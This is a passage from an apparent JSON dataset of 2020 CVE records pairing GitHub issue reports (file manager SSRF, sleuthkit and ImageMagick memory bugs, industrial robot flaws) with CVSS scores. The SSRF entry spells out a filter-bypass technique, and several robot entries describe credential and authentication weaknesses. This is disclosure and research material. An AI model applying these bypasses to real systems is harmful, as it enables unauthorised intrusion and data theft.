  45672. "CVE_ID": "CVE-2020-10212",
  45673. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/598",
  45674. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/598",
  45675. "Repo_new": "trippo/responsivefilemanager",
  45676. "Issue_Created_At": "2020-03-05T05:14:14Z",
  45677. "description": "server side request forgery vulnerbility in url uploader bypass CVETAG by adding /favicon.ico to end of php file.. Good afternoon APITAG When i was doing a security test for a client of mine i noticed in your newest version of APITAG NUMBERTAG in NUMBERTAG the url upload is completly broken but it also exist there ) internal server side request forgery by adding to any php APITAG to reproduce this i reccomand to install APITAG NUMBERTAG and not APITAG NUMBERTAG because the url file uploader is completly broken and doesn't work at all even with legit jpeg's, but this version is also vulnerble. you need to have url_upload enabled and run the code on a apache server with default configurations. now send as url > FILETAG when you send that go back to the file manager and you will see a ico. download that file and rename favicon.ico to FILETAG . if you now open that you will see the apache status page. as you can see this is a clear indication that CVETAG is bypassable. how does this work: there are a few problems here. first you only use a regex to verify if it is a allowed url. and in php files ( and sometimes html files ) it is allowed to extend the url. this means if i would go to FILETAG /favicon.ico than the apache server would execute index.php and not APITAG but it would extend the url. secondly i use dns pinning to bypass your miner filter to check if you send localhost because if you do a nslookup on NUMBERTAG ip.io\" you will get: bl4ckh4ck5 APITAG laptop:~/$ nslookup NUMBERTAG ip.io Server NUMBERTAG Address NUMBERTAG Non authoritative answer: Name NUMBERTAG ip.io Address NUMBERTAG and NUMBERTAG is localhost, but this method could also be used to access other ip's in the network. a while back i created a potential patch against SSRF what might help against this problem: URLTAG but i reccomand to make the design client side that the webbrowser downloads the image and than you use a xmlhttprequest to request the normal file upload, because that function isn't vulnerble. i reccomand to fix both problems that url upload works again in NUMBERTAG and that you fix this internal server side request forgery. A CVE is already been requested. Dear ragards, bl4ckh4ck5 FILETAG",
  45678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45679. "severity": "CRITICAL",
  45680. "baseScore": 9.8,
  45681. "impactScore": 5.9,
  45682. "exploitabilityScore": 3.9
  45683. },
  45684. {
  45685. "CVE_ID": "CVE-2020-10233",
  45686. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1829",
  45687. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1829",
  45688. "Repo_new": "sleuthkit/sleuthkit",
  45689. "Issue_Created_At": "2020-02-14T15:42:50Z",
  45690. "description": "Heap buffer overflow in ntfs_dinode_lookup. Hello sleuthkit team, As part of our fuzzing efforts at Google, we have identified an issue affecting sleuthkit (tested with revision develop APITAG To reproduce, we are attaching a Dockerfile which compiles the project with LLVM, taking advantage of the sanitizers that it offers. More information about how to use the attached Dockerfile can be found here: URLTAG Instructions: ERRORTAG APITAG CODETAG APITAG Alternatively, and depending on the bug, you could use gcc, valgrind or other instrumentation tools to aid in the investigation. The sanitizer error that we encountered is here: ERRORTAG We will gladly work with you so you can successfully confirm and reproduce this issue. Do let us know if you have any feedback surrounding the documentation. Once you have reproduced the issue, we'd appreciate to learn your expected timeline for an update to be released. With any fix, please attribute the report to APITAG Autofuzz project\". We are also pleased to inform you that your project is eligible for inclusion to the OSS Fuzz project, which can provide additional continuous fuzzing, and encourage you to investigate integration options. Don't hesitate to let us know if you have any questions! Google APITAG Team FILETAG",
  45691. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  45692. "severity": "CRITICAL",
  45693. "baseScore": 9.1,
  45694. "impactScore": 5.2,
  45695. "exploitabilityScore": 3.9
  45696. },
  45697. {
  45698. "CVE_ID": "CVE-2020-10251",
  45699. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1859",
  45700. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1859",
  45701. "Repo_new": "imagemagick/imagemagick",
  45702. "Issue_Created_At": "2020-03-03T19:01:32Z",
  45703. "description": "out of bounds read in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description An out of bounds read vulnerability exists within the APITAG function ( PATHTAG ) which can be triggered via an image with width or height in pixel more than length or actual physical size of the image. Steps to Reproduce poc (password: girlelecta): URLTAG cmd: FILETAG convert APITAG FILETAG Upon running this, following crash happens APITAG I enabled page heap on APITAG Microsoft (R) Windows Debugger Version NUMBERTAG Copyright (c) Microsoft Corporation. All rights reserved. APITAG APITAG PATHTAG convert PATHTAG FILETAG Path validation summary Response Time (ms) Location Executable search path is: APITAG NUMBERTAG f NUMBERTAG fb NUMBERTAG image NUMBERTAG f NUMBERTAG APITAG NUMBERTAG e NUMBERTAG f NUMBERTAG ntdll.dll APITAG NUMBERTAG ee NUMBERTAG f NUMBERTAG PATHTAG Page heap: pid APITAG page heap enabled with flags NUMBERTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG e NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b5b NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG bd NUMBERTAG bec NUMBERTAG PATHTAG APITAG NUMBERTAG PATHTAG APITAG NUMBERTAG bf NUMBERTAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ab NUMBERTAG bcf NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG df NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG ed NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG a NUMBERTAG a NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG ca NUMBERTAG caf NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG c NUMBERTAG a NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG d7a NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG fb NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG f NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b7e NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG ea NUMBERTAG f0 eb NUMBERTAG ec NUMBERTAG ae NUMBERTAG ed NUMBERTAG c0c0 esi NUMBERTAG a NUMBERTAG c NUMBERTAG edi NUMBERTAG eip NUMBERTAG b NUMBERTAG d esp NUMBERTAG f NUMBERTAG ebp NUMBERTAG e NUMBERTAG iopl NUMBERTAG nv up ei pl nz na po nc cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG IM_MOD_RL_HEIC NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG fb NUMBERTAG c NUMBERTAG movzx ecx,byte ptr [ecx+eax] ds NUMBERTAG f NUMBERTAG k APITAG APITAG WARNING: Stack unwind information not available. Following frames may be wrong NUMBERTAG f NUMBERTAG dc NUMBERTAG b NUMBERTAG e1 IM_MOD_RL_HEIC NUMBERTAG d ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG NUMBERTAG f NUMBERTAG f7b NUMBERTAG IM_MOD_RL_HEIC NUMBERTAG e NUMBERTAG f NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG dbfa2 APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG dc3be APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG e APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG db NUMBERTAG d APITAG NUMBERTAG f NUMBERTAG cc NUMBERTAG dbaa4 APITAG NUMBERTAG f NUMBERTAG dc NUMBERTAG dbb NUMBERTAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG b APITAG NUMBERTAG a NUMBERTAG f NUMBERTAG c NUMBERTAG e NUMBERTAG APITAG ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG e NUMBERTAG b NUMBERTAG ed NUMBERTAG APITAG NUMBERTAG c NUMBERTAG MSVCR NUMBERTAG malloc NUMBERTAG System Configuration APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG License: FILETAG Environment APITAG system, version and so on): Distributor ID: Microsoft Windows Description: Windows NUMBERTAG",
  45704. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  45705. "severity": "MEDIUM",
  45706. "baseScore": 5.5,
  45707. "impactScore": 3.6,
  45708. "exploitabilityScore": 1.8
  45709. },
  45710. {
  45711. "CVE_ID": "CVE-2020-10266",
  45712. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1487",
  45713. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1487",
  45714. "Repo_new": "aliasrobotics/rvd",
  45715. "Issue_Created_At": "2020-04-03T14:22:23Z",
  45716. "description": "No integrity checks on UR+ platform artifacts when installed in the robot. ERRORTAG",
  45717. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45718. "severity": "HIGH",
  45719. "baseScore": 8.1,
  45720. "impactScore": 5.9,
  45721. "exploitabilityScore": 2.2
  45722. },
  45723. {
  45724. "CVE_ID": "CVE-2020-10267",
  45725. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1489",
  45726. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1489",
  45727. "Repo_new": "aliasrobotics/rvd",
  45728. "Issue_Created_At": "2020-04-03T14:28:43Z",
  45729. "description": "Unprotected intelectual property in Universal Robots controller CB NUMBERTAG across firmware versions. ERRORTAG",
  45730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45731. "severity": "HIGH",
  45732. "baseScore": 7.5,
  45733. "impactScore": 3.6,
  45734. "exploitabilityScore": 3.9
  45735. },
  45736. {
  45737. "CVE_ID": "CVE-2020-10268",
  45738. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2550",
  45739. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2550",
  45740. "Repo_new": "aliasrobotics/rvd",
  45741. "Issue_Created_At": "2020-06-16T17:22:11Z",
  45742. "description": "Terminate Critical Services. ERRORTAG",
  45743. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  45744. "severity": "MEDIUM",
  45745. "baseScore": 6.1,
  45746. "impactScore": 5.2,
  45747. "exploitabilityScore": 0.9
  45748. },
  45749. {
  45750. "CVE_ID": "CVE-2020-10269",
  45751. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2566",
  45752. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2566",
  45753. "Repo_new": "aliasrobotics/rvd",
  45754. "Issue_Created_At": "2020-06-24T04:59:00Z",
  45755. "description": "Hardcoded Credentials on APITAG wireless Access Point. yaml id NUMBERTAG title: Hardcoded Credentials on APITAG wireless Access Point type: vulnerability description: One of the wireless interfaces within APITAG APITAG and possibly (according to the vendor) other APITAG fleet vehicles comes pre configured in APITAG Master APITAG Point) mode. Credentials to such wireless Access Point default to well known and widely spread SSID APITAG and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. We have confirmed this flaw in APITAG and APITAG but it might also apply to APITAG APITAG and APITAG cwe: CVETAG cve: CVETAG keywords: APITAG APITAG APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD, Autentication system: APITAG and before, APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD vendor: Mobile Industrial Robots A/S, APITAG Enabled Robotics, UVD Robots severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: Critical cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG FILETAG URLTAG flaw: phase: testing specificity: general issue architectural location: Platform code application: All subsystem: APITAG package: N/A languages: None date detected NUMBERTAG detected by: Bernhard Dieber APITAG Research), Alias Robotics ( URLTAG detected by method: testing dynamic, web browser. date reported NUMBERTAG reported by: APITAG Robotics ( URLTAG further edited by PATHTAG ctor Mayoral Vilches APITAG Robotics)\" reported by relationship: security researcher issue: null reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
  45756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45757. "severity": "CRITICAL",
  45758. "baseScore": 9.8,
  45759. "impactScore": 5.9,
  45760. "exploitabilityScore": 3.9
  45761. },
  45762. {
  45763. "CVE_ID": "CVE-2020-10270",
  45764. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2557",
  45765. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2557",
  45766. "Repo_new": "aliasrobotics/rvd",
  45767. "Issue_Created_At": "2020-06-24T04:43:23Z",
  45768. "description": "Hardcoded Credentials on APITAG Control Dashboard. ERRORTAG",
  45769. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45770. "severity": "CRITICAL",
  45771. "baseScore": 9.8,
  45772. "impactScore": 5.9,
  45773. "exploitabilityScore": 3.9
  45774. },
  45775. {
  45776. "CVE_ID": "CVE-2020-10271",
  45777. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2555",
  45778. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2555",
  45779. "Repo_new": "aliasrobotics/rvd",
  45780. "Issue_Created_At": "2020-06-24T04:34:30Z",
  45781. "description": "APITAG ROS computational graph is exposed to all network interfaces, including poorly secured wireless networks and open wired ones. ERRORTAG",
  45782. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45783. "severity": "CRITICAL",
  45784. "baseScore": 9.8,
  45785. "impactScore": 5.9,
  45786. "exploitabilityScore": 3.9
  45787. },
  45788. {
  45789. "CVE_ID": "CVE-2020-10272",
  45790. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2554",
  45791. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2554",
  45792. "Repo_new": "aliasrobotics/rvd",
  45793. "Issue_Created_At": "2020-06-24T04:14:56Z",
  45794. "description": "APITAG ROS computational graph presents no authentication mechanisms. ERRORTAG",
  45795. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45796. "severity": "CRITICAL",
  45797. "baseScore": 9.8,
  45798. "impactScore": 5.9,
  45799. "exploitabilityScore": 3.9
  45800. },
  45801. {
  45802. "CVE_ID": "CVE-2020-10273",
  45803. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2560",
  45804. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2560",
  45805. "Repo_new": "aliasrobotics/rvd",
  45806. "Issue_Created_At": "2020-06-24T04:50:27Z",
  45807. "description": "Unprotected intellectual property in Mobile Industrial Robots APITAG controllers. ERRORTAG",
  45808. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45809. "severity": "HIGH",
  45810. "baseScore": 7.5,
  45811. "impactScore": 3.6,
  45812. "exploitabilityScore": 3.9
  45813. },
  45814. {
  45815. "CVE_ID": "CVE-2020-10274",
  45816. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2556",
  45817. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2556",
  45818. "Repo_new": "aliasrobotics/rvd",
  45819. "Issue_Created_At": "2020-06-24T04:37:32Z",
  45820. "description": "APITAG REST API allows for data exfiltration by unauthorized attackers (e.g. indoor maps). ERRORTAG",
  45821. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  45822. "severity": "HIGH",
  45823. "baseScore": 7.1,
  45824. "impactScore": 4.2,
  45825. "exploitabilityScore": 2.8
  45826. },
  45827. {
  45828. "CVE_ID": "CVE-2020-10275",
  45829. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2565",
  45830. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2565",
  45831. "Repo_new": "aliasrobotics/rvd",
  45832. "Issue_Created_At": "2020-06-24T04:56:18Z",
  45833. "description": "Weak token generation for the REST API.. ERRORTAG",
  45834. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45835. "severity": "CRITICAL",
  45836. "baseScore": 9.8,
  45837. "impactScore": 5.9,
  45838. "exploitabilityScore": 3.9
  45839. },
  45840. {
  45841. "CVE_ID": "CVE-2020-10276",
  45842. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2558",
  45843. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2558",
  45844. "Repo_new": "aliasrobotics/rvd",
  45845. "Issue_Created_At": "2020-06-24T04:45:55Z",
  45846. "description": "Default credentials on SICK PLC allows disabling safety features. ERRORTAG",
  45847. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45848. "severity": "CRITICAL",
  45849. "baseScore": 9.8,
  45850. "impactScore": 5.9,
  45851. "exploitabilityScore": 3.9
  45852. },
  45853. {
  45854. "CVE_ID": "CVE-2020-10277",
  45855. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2562",
  45856. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2562",
  45857. "Repo_new": "aliasrobotics/rvd",
  45858. "Issue_Created_At": "2020-06-24T04:52:57Z",
  45859. "description": "Booting from a live image leads to exfiltration of sensible information and privilege escalation. yaml id NUMBERTAG title: Booting from a live image leads to exfiltration of sensible information and privilege escalation type: vulnerability description: There is no mechanism in place to prevent a bad operator to boot from a live OS image, this can lead to extraction of sensible files (such as the shadow file) or privilege escalation by manually adding a new user with sudo privileges on the machine. cwe: CVETAG cve: CVETAG keywords: APITAG APITAG APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD system: APITAG and before, APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD vendor: Mobile Industrial Robots A/S, APITAG Enabled Robotics, UVD Robots severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: high cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG flaw: phase: testing specificity: General Issue architectural location: application specific application: Ubuntu subsystem: N/A package: N/A languages: N/A date detected NUMBERTAG detected by: Lander Usategui, Alfonso Glera APITAG Robotics) detected by method: testing dynamic date reported NUMBERTAG reported by: APITAG Mayoral Vilches APITAG Robotics)\" reported by relationship: security researcher issue: null reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
  45860. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H",
  45861. "severity": "MEDIUM",
  45862. "baseScore": 6.4,
  45863. "impactScore": 5.5,
  45864. "exploitabilityScore": 0.9
  45865. },
  45866. {
  45867. "CVE_ID": "CVE-2020-10278",
  45868. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2561",
  45869. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2561",
  45870. "Repo_new": "aliasrobotics/rvd",
  45871. "Issue_Created_At": "2020-06-24T04:51:45Z",
  45872. "description": "Unprotected BIOS allows user to boot from live OS image.. ERRORTAG",
  45873. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  45874. "severity": "MEDIUM",
  45875. "baseScore": 4.6,
  45876. "impactScore": 3.6,
  45877. "exploitabilityScore": 0.9
  45878. },
  45879. {
  45880. "CVE_ID": "CVE-2020-10279",
  45881. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2569",
  45882. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2569",
  45883. "Repo_new": "aliasrobotics/rvd",
  45884. "Issue_Created_At": "2020-06-24T06:00:50Z",
  45885. "description": "Insecure operating system defaults in APITAG robots. ERRORTAG",
  45886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45887. "severity": "CRITICAL",
  45888. "baseScore": 9.8,
  45889. "impactScore": 5.9,
  45890. "exploitabilityScore": 3.9
  45891. },
  45892. {
  45893. "CVE_ID": "CVE-2020-10280",
  45894. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2568",
  45895. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2568",
  45896. "Repo_new": "aliasrobotics/rvd",
  45897. "Issue_Created_At": "2020-06-24T05:44:10Z",
  45898. "description": "Apache server is vulnerable to a APITAG ERRORTAG",
  45899. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  45900. "severity": "HIGH",
  45901. "baseScore": 7.5,
  45902. "impactScore": 3.6,
  45903. "exploitabilityScore": 3.9
  45904. },
  45905. {
  45906. "CVE_ID": "CVE-2020-10283",
  45907. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3316",
  45908. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3316",
  45909. "Repo_new": "aliasrobotics/rvd",
  45910. "Issue_Created_At": "2020-06-30T17:20:40Z",
  45911. "description": "RVD NUMBERTAG No authentication in APITAG protocol. ERRORTAG",
  45912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45913. "severity": "CRITICAL",
  45914. "baseScore": 9.8,
  45915. "impactScore": 5.9,
  45916. "exploitabilityScore": 3.9
  45917. },
  45918. {
  45919. "CVE_ID": "CVE-2020-10285",
  45920. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3322",
  45921. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3322",
  45922. "Repo_new": "aliasrobotics/rvd",
  45923. "Issue_Created_At": "2020-07-15T20:55:50Z",
  45924. "description": "Weak authentication implementation make the system vulnerable to a brute force attack over adjacent networks. ERRORTAG",
  45925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45926. "severity": "CRITICAL",
  45927. "baseScore": 9.8,
  45928. "impactScore": 5.9,
  45929. "exploitabilityScore": 3.9
  45930. },
  45931. {
  45932. "CVE_ID": "CVE-2020-10286",
  45933. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3323",
  45934. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3323",
  45935. "Repo_new": "aliasrobotics/rvd",
  45936. "Issue_Created_At": "2020-07-15T21:06:12Z",
  45937. "description": "Mismanaged permission implementation leads to privilege escalation, exfiltration of sensitive information, and APITAG ERRORTAG",
  45938. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45939. "severity": "HIGH",
  45940. "baseScore": 8.8,
  45941. "impactScore": 5.9,
  45942. "exploitabilityScore": 2.8
  45943. },
  45944. {
  45945. "CVE_ID": "CVE-2020-10287",
  45946. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3326",
  45947. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3326",
  45948. "Repo_new": "aliasrobotics/rvd",
  45949. "Issue_Created_At": "2020-07-15T21:59:00Z",
  45950. "description": "Hardcoded default credentials on IRC NUMBERTAG OPC Server. ERRORTAG",
  45951. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45952. "severity": "CRITICAL",
  45953. "baseScore": 9.8,
  45954. "impactScore": 5.9,
  45955. "exploitabilityScore": 3.9
  45956. },
  45957. {
  45958. "CVE_ID": "CVE-2020-10288",
  45959. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3327",
  45960. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3327",
  45961. "Repo_new": "aliasrobotics/rvd",
  45962. "Issue_Created_At": "2020-07-15T22:03:16Z",
  45963. "description": "No authentication required for accesing ABB IRC5 FTP server. yaml id NUMBERTAG title: No authentication required for accesing ABB IRC5 FTP server type: vulnerability description: IRC5 exposes an ftp server (port NUMBERTAG Upon attempting to gain access you are challenged with a request of username and password, however you can input whatever you like. As long as the field isn't empty it will be accepted. cwe: CVETAG cve: CVETAG keywords: IRC5, FTP, Autentication system: IRB NUMBERTAG IRC5, Robotware NUMBERTAG APITAG vendor: ABB severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: Critical cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG flaw: phase: testing specificity: general issue architectural location: Plataform code application: FTP server subsystem: APITAG package: N/A languages: None date detected NUMBERTAG detected by: Alfonso Glera, Victor Mayoral Vilches APITAG Robotics) detected by method: testing dynamic, Nmap. date reported NUMBERTAG reported by: Victor Mayoral Vilches reported by relationship: security researcher issue: null reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
  45964. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45965. "severity": "CRITICAL",
  45966. "baseScore": 9.8,
  45967. "impactScore": 5.9,
  45968. "exploitabilityScore": 3.9
  45969. },
  45970. {
  45971. "CVE_ID": "CVE-2020-10290",
  45972. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1495",
  45973. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1495",
  45974. "Repo_new": "aliasrobotics/rvd",
  45975. "Issue_Created_At": "2020-04-03T15:49:12Z",
  45976. "description": "Universal Robots APITAG execute with unbounded privileges. ERRORTAG",
  45977. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45978. "severity": "MEDIUM",
  45979. "baseScore": 6.8,
  45980. "impactScore": 5.9,
  45981. "exploitabilityScore": 0.9
  45982. },
  45983. {
  45984. "CVE_ID": "CVE-2020-10291",
  45985. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3336",
  45986. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3336",
  45987. "Repo_new": "aliasrobotics/rvd",
  45988. "Issue_Created_At": "2020-11-06T09:25:26Z",
  45989. "description": "System information disclosure without authentication on KUKA simulators. ERRORTAG",
  45990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45991. "severity": "HIGH",
  45992. "baseScore": 7.5,
  45993. "impactScore": 3.6,
  45994. "exploitabilityScore": 3.9
  45995. },
  45996. {
  45997. "CVE_ID": "CVE-2020-1045",
  45998. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/165",
  45999. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/165",
  46000. "Repo_new": "dotnet/announcements",
  46001. "Issue_Created_At": "2020-09-08T17:44:01Z",
